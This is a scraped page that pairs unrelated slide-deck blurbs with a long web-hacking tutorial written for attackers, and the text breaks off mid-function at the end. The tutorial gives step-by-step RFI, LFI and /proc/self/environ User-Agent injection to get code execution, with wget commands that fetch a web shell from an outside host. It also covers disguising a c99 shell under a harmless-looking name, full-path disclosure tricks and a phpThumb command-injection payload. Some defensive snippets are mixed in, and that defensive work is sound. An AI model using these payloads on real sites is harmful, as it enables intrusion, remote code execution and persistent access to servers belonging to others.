Six months into 2024, and it is clear the privacy ecosystem takes no days off!! Regulators continue to implement and enforce new regulations, businesses strive to meet requirements, and technology advances like AI have privacy professionals scratching their heads about managing risk.
What can we learn about the first six months of data privacy trends and events in 2024? How should this inform your privacy program management for the rest of the year?
Join TrustArc, Goodwin, and Snyk privacy experts as they discuss the changes we’ve seen in the first half of 2024 and gain insight into the concrete, actionable steps you can take to up-level your privacy program in the second half of the year.
This webinar will review:
- Key changes to privacy regulations in 2024
- Key themes in privacy and data governance in 2024
- How to maximize your privacy program in the second half of 2024
Comparison Table of DiskWarrior Alternatives.pdfAndrey Yasko
To help you choose the best DiskWarrior alternative, we've compiled a comparison table summarizing the features, pros, cons, and pricing of six alternatives.
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Chris Swan
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Coordinate Systems in FME 101 - Webinar SlidesSafe Software
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxSynapseIndia
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
The Rise of Supernetwork Data Intensive ComputingLarry Smarr
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
YOUR RELIABLE WEB DESIGN & DEVELOPMENT TEAM — FOR LASTING SUCCESS
WPRiders is a web development company specialized in WordPress and WooCommerce websites and plugins for customers around the world. The company is headquartered in Bucharest, Romania, but our team members are located all over the world. Our customers are primarily from the US and Western Europe, but we have clients from Australia, Canada and other areas as well.
Some facts about WPRiders and why we are one of the best firms around:
More than 700 five-star reviews! You can check them here.
1500 WordPress projects delivered.
We respond 80% faster than other firms! Data provided by Freshdesk.
We’ve been in business since 2015.
We are located in 7 countries and have 22 team members.
With so many projects delivered, our team knows what works and what doesn’t when it comes to WordPress and WooCommerce.
Our team members are:
- highly experienced developers (employees & contractors with 5 -10+ years of experience),
- great designers with an eye for UX/UI with 10+ years of experience
- project managers with development background who speak both tech and non-tech
- QA specialists
- Conversion Rate Optimisation - CRO experts
They are all working together to provide you with the best possible service. We are passionate about WordPress, and we love creating custom solutions that help our clients achieve their goals.
At WPRiders, we are committed to building long-term relationships with our clients. We believe in accountability, in doing the right thing, as well as in transparency and open communication. You can read more about WPRiders on the About us page.
Blockchain technology is transforming industries and reshaping the way we conduct business, manage data, and secure transactions. Whether you're new to blockchain or looking to deepen your knowledge, our guidebook, "Blockchain for Dummies", is your ultimate resource.
7 Most Powerful Solar Storms in the History of Earth.pdfEnterprise Wired
Solar Storms (Geo Magnetic Storms) are the motion of accelerated charged particles in the solar environment with high velocities due to the coronal mass ejection (CME).
Implementations of Fused Deposition Modeling in real worldEmerging Tech
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfNeo4j
Presented at Gartner Data & Analytics, London Maty 2024. BT Group has used the Neo4j Graph Database to enable impressive digital transformation programs over the last 6 years. By re-imagining their operational support systems to adopt self-serve and data lead principles they have substantially reduced the number of applications and complexity of their operations. The result has been a substantial reduction in risk and costs while improving time to value, innovation, and process automation. Join this session to hear their story, the lessons they learned along the way and how their future innovation plans include the exploration of uses of EKG + Generative AI.
Transcript: Details of description part II: Describing images in practice - T...BookNet Canada
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and slides: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsMydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
Part 1
Web-hacking Attacks
This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from this.
Guide content:
Remote file inclusion
Local file inclusion
LFI 2 RCE
LFI 2 RCE Using Firefox
Local file download
Full path disclosure
Command Injection Vulnerability Exploit
SQL Injection - with load file
MSSQL Injection
Blind SQL Injection
PostgreSQL Injection
Error based PostgreSQL Injection
SQL Injection on ASPX
DotNetNuke
XSS
CRLF
CSRF
Server Side Includes | Server Side Inclusion
Symlink Attack
SQL Injection String & Union based
XPath Injection
LDAP Injection
DNS Zone Transfer Vulnerability Exploit
Oracle Padding Attack Using Burp Suite
So let's get started!
Remote file inclusion:
1) RFI
RFI (Remote File Inclusion) is a type of web-hacking. It occurs when a PHP script passes a
GET parameter straight to include() to pull in a file. The included file is usually a
txt-format page whose content is printed.
Example:
Code:
http://www.site.com/index.php?page=home
Nowadays RFI is rarely in use, and all you need to use it on a vulnerable site is a shell in txt
format. (Since PHP 5.2, include() only fetches remote URLs when the allow_url_include setting is
enabled, and it is off by default, which is why RFI has become rare.)
2) Vulnerable script
Code:
<?php
$page = $_GET['page'];
include($page);
?>
3) Exploiting vulnerability
We have a site:
Code:
http://www.site.com/index.php?page=home
Now, instead of home, we are going to use our shell.
So we get:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?
If the site is vulnerable it should show the shell with a list of files from the site you are attacking.
4) Null byte bypass
Some scripts have a weak protection that appends an extension such as .html to the included
file name:
Code:
<?php
$page = $_GET['page'];
include($page.".html");
?>
In that case we are going to use the null byte bypass (%00).
Everything after %00 is ignored, so the appended extension never reaches the file system. We also
use %00 to bypass picture-upload checks and upload PHP, but I am not going to talk about that here.
(Note that PHP 5.3.4 and later reject file paths that contain a null byte, so this bypass only
works on older versions.)
So the link should look like this:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00
5) Protection script
The unprotected script looks like this:
Code:
<?php
$page = $_GET['page'];
include($page);
?>
So we are going to add some stuff to protect it:
Code:
<?php
$page = $_GET['page'];
// only include a file that already exists inside the local pages/ directory,
// so a remote URL is never fetched; include the same path that was checked
if (file_exists("pages/" . $page)) {
    include("pages/" . $page);
}
?>
Note that file_exists() still accepts "../" inside $page, so this check blocks RFI but not
traversal to other local files; restricting $page to an allow-list of page names is safer.
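As an added example (not part of the tutorial), a stricter replacement for the protection script above: it restricts the page parameter to an allow-listed name pattern, builds the path and extension itself, and confirms the canonical path stays inside a local pages/ directory (the directory name and the .html extension are assumptions). The same function refuses remote URLs, %00 and ../ traversal alike.

```php
<?php
// Added example (not from the tutorial): a hardened replacement for the
// page-include pattern. It assumes a directory "pages/" next to this script
// that holds the includable files (directory name and extension are assumptions).

const PAGES_DIR = __DIR__ . '/pages';

/**
 * Resolve a user-supplied page name to an includable file path, or return
 * null if the request must be refused. Remote URLs (RFI), null bytes (%00)
 * and ../ traversal (LFI) are refused by construction, not by blacklist.
 */
function resolve_page(string $page): ?string
{
    // 1. Accept only a simple page name: letters, digits, "_" and "-".
    //    "www.shell-link.com/shell.txt", "../../etc/passwd" and any name
    //    carrying a decoded %00 all fail this test.
    if (!preg_match('/\A[a-zA-Z0-9_-]{1,64}\z/', $page)) {
        return null;
    }

    // 2. Build the path and append the extension ourselves, so the caller
    //    can never choose the file's location or its type.
    $candidate = PAGES_DIR . '/' . $page . '.html';

    // 3. Canonicalise and confirm the result still lives under PAGES_DIR.
    //    realpath() returns false for a missing file, which covers "not found".
    $real = realpath($candidate);
    $base = realpath(PAGES_DIR);
    if ($real === false || $base === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Defence in depth: keep allow_url_include=Off in php.ini as well, so that
// even a future bug in this function cannot turn into remote inclusion.
$page = $_GET['page'] ?? 'home';
$file = resolve_page($page);
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```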
Local file inclusion:
1) LFI?
LFI can be used on sites like:
Code:
http://link.com/index.php?page=
by adding
Code:
../../../../../../etc/passwd
(sometimes you have to append %00 after passwd).
2) Finding vulnerable sites:
Code:
index.php?page=
index.php?option=
search.php?word=
3) Checking site vulnerability:
Find some site and use
Code:
../../../../../../../../../../../etc/passwd
or
Code:
../../../../../../../../../../../etc/passwd%00
When you enter this to link you get this:
Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List
Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-
exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
ntp:x:103:106::/home/ntp:/bin/false
snmp:x:104:65534::/var/lib/snmp:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
which means that site is vulnerable.
4) /proc/self/environ
Now we check whether we can read /proc/self/environ through the inclusion, because that file can be turned into code execution. It holds the environment of the process handling our request; when PHP runs as CGI or FastCGI (note GATEWAY_INTERFACE=CGI/1.1 below) the request headers are exported there as HTTP_* variables, and we control headers such as User-Agent.
Instead of etc/passwd%00 we put /proc/self/environ.
If the page prints this:
Code:
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster**website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv..........
then /proc/self/environ is readable and we can upload the shell. Note that this is the environment of our own request: whatever we put in the User-Agent header appears in HTTP_USER_AGENT, and because the file goes through include() it is parsed as PHP.
5) Shell uploading
To upload the shell we need Mozilla Firefox:
Code:
http://www.mozilla.com/firefox/
and the add-on Tamper Data:
Code:
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Open the vulnerable page, e.g.:
Code:
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ
Tools > Tamper Data, click Start Tamper, then refresh the page and replace the User-Agent header with this code:
Code:
<?system('wget www.link.com/shell.txt -O shell.php');?>
(use <?php system(...); ?> if short_open_tag is Off on the target). Click OK. The server now runs wget, fetches the shell source from our host and writes it as shell.php into the working directory of the script, normally the document root. To access the shell use:
Code:
http://www.site.com/shell.php
Once the shell is open, run a few commands to see who and where you are:
Code:
id
uname -a
ls -l
pwd
Now upload a fuller shell (c99) to this web server, unpack it and give it a .php name. Either keep it as c99.php or rename it to something that blends in with the site's existing pages (the example assumes Out14ws.php is such a page name):
Code:
wget http://downloading-link-of-shell.com/c99.txt.zip
unzip c99.txt.zip
mv c99.txt c99.php
mv c99.txt Out14ws.php
ls | grep c99
ls | grep Out14ws
pwd
mv renames the file, it does not keep a copy under the old name, so only one of the two mv lines applies. pwd shows the directory the shell was written to, which you need to build its URL. Then open the full link of your shell in your web browser:
Code:
http://website-name/path/path/c99.php
http://website-name/path/path/Out14ws.php
LFI 2 RCE using Firefox
This variant uses Firefox's built-in user agent override instead of Tamper Data. First check whether the target is vulnerable to LFI:
Code:
http://www.site.com/index.php?page=../../../../../../../../etc/passwd
or
Code:
http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00
Then see whether /proc/self/environ is readable:
Code:
http://www.site.com/index.php?page=../../../../../../proc/self/environ
or
Code:
http://www.site.com/index.php?page=../../../../../../proc/self/environ%00
Now in the Firefox address bar type:
Code:
about:config
Right-click anywhere in the list > New > String. For the preference name enter:
Code:
general.useragent.override
Press OK; a new box pops up asking for the string value. Enter:
Code:
<?php phpinfo(); ?>
Firefox now sends that as its User-Agent header. Refresh the vulnerable link and the phpinfo() output appears in the page. Check the PHP version and, under disable_functions, which execution functions are blocked (system, passthru, shell_exec, popen, escapeshellcmd, proc_open, etc.), and pick a command function that is not listed.
Once you have checked the phpinfo output, go back to about:config, find general.useragent.override and change its value to:
Code:
<pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print "$output\n";}?></pre>
In place of YOUR COMMAND type a command such as ls -a, uname -a, cat /etc/passwd or pwd. To upload a shell use a command like wget http://www.link.com/c99.txt -O c99.php. Note: after changing the command you have to refresh the vulnerable page to get its output; the command runs on every request that includes /proc/self/environ while the override is set, so reset the preference when you are done.
Command:
Code:
ls -la
Output: shown on refreshing the page.
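As an added example that is not part of the tutorial, here is the defender's view of the two steps above: a small scanner that flags the ../ traversal, /proc/self/environ and PHP-in-User-Agent patterns in Apache combined-format access log lines, decoding the %2F / %00 encodings first. The log lines are constructed for the demo and the host names in them are made up.

```python
import re
from urllib.parse import unquote

# Added example, not part of the tutorial: detection for the LFI and
# /proc/self/environ techniques above, run over Apache combined-log lines.
# The log lines below are constructed for the demo; no real host is involved.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'(\.\./){2,}')          # applied after decoding
SENSITIVE_RE = re.compile(r'/etc/passwd|/proc/self/environ|boot\.ini|win\.ini', re.I)
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)?\s*[A-Za-z_]')   # <?php ..., <?system(


def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (..%2F, ..%252F, ...)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return the list of tags for one log line; [] means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable"]
    path = decode_fully(m.group("path"))
    ua = decode_fully(m.group("ua"))
    tags = []
    if TRAVERSAL_RE.search(path) or "\x00" in path:
        tags.append("lfi-traversal")          # ../ chains or %00 truncation
    if SENSITIVE_RE.search(path):
        tags.append("sensitive-file")
    if PHP_TAG_RE.search(ua):
        tags.append("php-in-user-agent")      # code meant for include()
    if "/proc/self/environ" in path and "php-in-user-agent" in tags:
        tags.append("environ-rce-attempt")    # the exact chain used above
    return tags


def scan(lines):
    """Map each flagged line to its tags, skipping clean lines."""
    return {line: classify(line) for line in lines if classify(line)}


# Constructed sample: one normal request, one LFI probe, one environ RCE try.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2012:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2012:10:01:07 +0000] '
    '"GET /index.php?page=../../../../../../etc/passwd%00 HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2012:10:01:20 +0000] '
    '"GET /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" '
    '200 4096 "-" "<?system(\'wget www.link.com/shell.txt -O shell.php\');?>"',
]

if __name__ == "__main__":
    for line, tags in scan(SAMPLE_LOG).items():
        print(tags, line[:70])
```

The decode step is the part that matters: the tutorial's own request shows the traversal arriving as ..%2F, and a filter that looks for a literal ../ in the raw line misses it entirely.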
Local file download:
1) LFD?
LFD (Local File Download) is a vulnerability in a script used to download files, where the file name comes straight from the request. The example takes the name from the GET method, but the script below only acts on a POST request, so you combine both with the add-on Tamper Data (send a POST with the download field and put the file name in the URL).
Code:
http://site.com/download_file.php?file=notepad.exe
2) Vulnerable script
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
3) Vulnerability check
To check whether the script is vulnerable we try to download etc/passwd.
So instead of:
Code:
http://site.com/download_file.php?file=notepad.exe
we use:
Code:
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd
If a download starts and the file, opened in a text editor, looks something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
the script is vulnerable!
NOTE: If it is a Windows server use boot.ini (Windows XP/2003) or windows/win.ini (any Windows version) instead of etc/passwd.
4) Exploiting the vulnerability
Now that we know the script is vulnerable, we want to see which files are on the host. You can try it like this:
Code:
http://site.com/download_file.php?file=../
Each ../ takes us one directory up, and the script then tries to send that directory as a file. Two outcomes are possible:
1.1 The download works and, opened in a text editor, the file lists the contents of the directory.
1.2 The download works but the file is empty (on Linux readfile() fails on a directory, so this is the usual case).
In case 1.1 we do not have to guess file names and directories and can download whatever we want.
In case 1.2 we must guess file names and directories and can download only files whose names we guess. A few programs can help to find files (Acunetix and HTTrack Website Copier), and the Full path disclosure section below helps to learn real directory names.
5) Protection script
We have the script mentioned at the start:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
Adding only if(file_exists("download/".$file)) is not enough: download/../../etc/passwd exists just as well, and the script would still read it. The parameter has to be reduced to a bare file name with basename(), and every file operation has to use the prefixed path:
Code:
<?php
if(isset($_POST['download'])) {
$file = basename($_GET['file']);
$path = "download/".$file;
$file_info = pathinfo($path);
if(file_exists($path) && is_file($path)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($path));
readfile($path);
exit;
}
}
?>
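As an added example, not code from the tutorial, here is the path check that both the include() protection in the RFI/LFI section and the download protection above need, written in Python so it can be run offline against the tutorial's own payloads. The directory names, the page whitelist and the sample inputs are assumptions; the parameter is taken to be the already URL-decoded value, which is what PHP's $_GET holds.

```python
import posixpath

# Added example, not part of the tutorial: the check that the include() and
# readfile() "protection scripts" need. Directory names, whitelist and
# inputs are assumptions for the demo.

PAGES_DIR = "/var/www/pages"                  # assumed includable pages
DOWNLOAD_DIR = "/var/www/download"            # assumed downloadable files
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed whitelist


class UnsafePathError(ValueError):
    """Raised for any parameter that must not reach include()/readfile()."""


def resolve_under(base_dir, user_value):
    """Return the absolute path of user_value inside base_dir, or raise.

    Rejects null bytes (the %00 truncation trick), URL schemes (remote
    inclusion), and absolute or ../ paths that resolve outside base_dir.
    """
    if "\x00" in user_value:
        raise UnsafePathError("null byte in parameter")
    if "://" in user_value or user_value.startswith("//"):
        raise UnsafePathError("URL in parameter")
    base = posixpath.normpath("/" + base_dir.strip("/"))
    # normpath collapses ../ segments before the comparison, so
    # "home/../../../etc/passwd" becomes "/var/etc/passwd" and is rejected.
    candidate = posixpath.normpath(posixpath.join(base, user_value))
    if candidate == base or not candidate.startswith(base + "/"):
        raise UnsafePathError("path escapes " + base)
    return candidate


def safe_include_path(page):
    """index.php?page=...: whitelist first, then resolve under PAGES_DIR."""
    if page not in ALLOWED_PAGES:
        raise UnsafePathError("page not in whitelist")
    return resolve_under(PAGES_DIR, page + ".php")


def safe_download_path(name):
    """download_file.php?file=...: bare file name only, like PHP basename()."""
    if posixpath.basename(name) != name:
        raise UnsafePathError("directory component in file name")
    return resolve_under(DOWNLOAD_DIR, name)


def rejects(func, value):
    """True if func(value) raises UnsafePathError."""
    try:
        func(value)
    except UnsafePathError:
        return True
    return False
```

On a real file system, call os.path.realpath() on the resolved candidate and repeat the prefix check, so a symlink planted inside the directory cannot point outside it; the string-level check above is what stops the payloads shown in this tutorial.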
Full path disclosure:
This method uses errors in files, or mistakes made by programmers, to reveal which files live in which directories. You cannot hack a site directly with it; it only helps you while hacking.
It is useful because it makes hacking faster and easier, and it helps with Local File Inclusion (LFI) when a folder name has been changed, or some other file moved: you can find the real path with FPD.
There are many ways of using an FPD vulnerability on a site; I will explain the 2 most important.
The 1st is via an array, by adding square brackets to a parameter in a link like this one:
Code:
index.php?page=home
To trigger the error, add [] in the right place:
Code:
index.php?page[]=home
PHP then receives an array where the script expects a string, and the failing include() reports the full path:
Code:
Warning: include(blah/errors.php) [function.include]: failed to open stream:
No such file or directory in /home/insekure/public_html/index.php on line 211
From this you can see that the directory blah exists on the site, and that the document root is /home/insekure/public_html.
The 2nd method is to break the most common cookie (the PHP session cookie). You can set it by JavaScript injection from the address bar; the invalid session id makes the site throw an error.
This is the JavaScript code:
Code:
javascript:void(document.cookie='PHPSESSID=');
Put that in your address bar and hit enter; when the page is refreshed you will get this error:
Code:
Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/example/public_html/thems/errors.php on line 58
Then try to open the directory thems on the site; if directory listing is enabled, that should list the files in it.
Protection:
The simplest way to protect against these attacks is to stop showing errors to visitors. Edit or add at the top of the script:
Code:
error_reporting(0);
Better still, keep error reporting on but set display_errors = Off and log_errors = On in php.ini, so errors go to the server log instead of the browser.
Command Injection Vulnerability Exploit
phpThumb() "fltr[]" Command Injection Vulnerability Exploit Scans
Automatic Shell upload
I. phpThumb() "fltr[]" Command Injection Vulnerability
Since the 21st of December 2011 we've identified over 300 attempts to exploit the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability aka CVE-2010-1598, reported back in April 2010. Input passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a command line argument.
This can be exploited to inject and execute arbitrary shell commands via specially crafted requests.
Successful exploitation requires that "ImageMagick" is installed.
The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password".
Source: phpThumb() "fltr[]" Command Injection Vulnerability
By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level commands, as there aren't any input validation checks on the $command data in phpthumb.functions.php.
Code:
function ImageMagickThumbnailToGD() {
    ...
    foreach ($this->fltr as $filterkey => $filtercommand) {
        @list($command, $parameter) = explode('|', $filtercommand, 2);
        switch ($command) {
            ...
            case 'blur':
                if ($this->ImageMagickSwitchAvailable('blur')) {
                    @list($radius) = explode('|', $parameter);
                    $radius = ($radius ? $radius : 1);
                    $commandline .= ' -blur '.$radius;
                    unset($this->fltr[$filterkey]);
                }
                break;
            ...
    $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__);
    $IMresult = phpthumb_functions::SafeExec($commandline);
    clearstatcache();
    if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
        @unlink($IMtempSourceFilename);
    }
    if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
        $this->FatalError('ImageMagick failed with message ('.trim($IMresult).')');
        $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);
    ...
}
The issue was first addressed in version 1.7.10, and in version 1.7.11 the author added even more explicit escaping of command line parameters, according to the changelog.
escapeshellarg
The updated code uses the PHP escapeshellarg function and also limits the length of the input.
Code:
case 'blur':
    if ($this->ImageMagickSwitchAvailable('blur')) {
        @list($radius) = explode('|', $parameter);
        $radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);
        $commandline .= ' -blur '.escapeshellarg($radius);
        $successfullyProcessedFilters[] = $filterkey;
    }
    break;
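As an added example that is not phpThumb's own code, the same bug and its fix written in Python so the effect of the 1.7.11 change can be tested offline: one builder splices the filter value into a shell string the way the 1.7.9 code did; the other mirrors the fix (intval() plus clamp, then escapeshellarg(), whose Python equivalent is shlex.quote()) and, better still, never hands the value to a shell at all. The file names are assumptions; the payload is the blur value from the scan requests quoted on this page. shell_command_count() reports how many commands a POSIX shell would run for each string.

```python
import re
import shlex

# Added example, not phpThumb's code: the vulnerable and the hardened way of
# building the ImageMagick command line. File names are assumptions; the
# payload is the one from the scan requests discussed on this page.

PAYLOAD = "9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp"


def vulnerable_command(src, dst, radius):
    """Pre-1.7.10 behaviour: the raw filter value is spliced into a shell string."""
    return "convert %s -blur %s %s" % (src, radius, dst)


def parse_radius(value):
    """PHP's (!empty($r) ? min(max(intval($r), 0), 25) : 1) in Python."""
    if not value:
        return 1
    m = re.match(r'\s*([+-]?\d+)', value)   # intval() keeps the leading integer only
    n = int(m.group(1)) if m else 0
    return min(max(n, 0), 25)


def hardened_argv(src, dst, radius):
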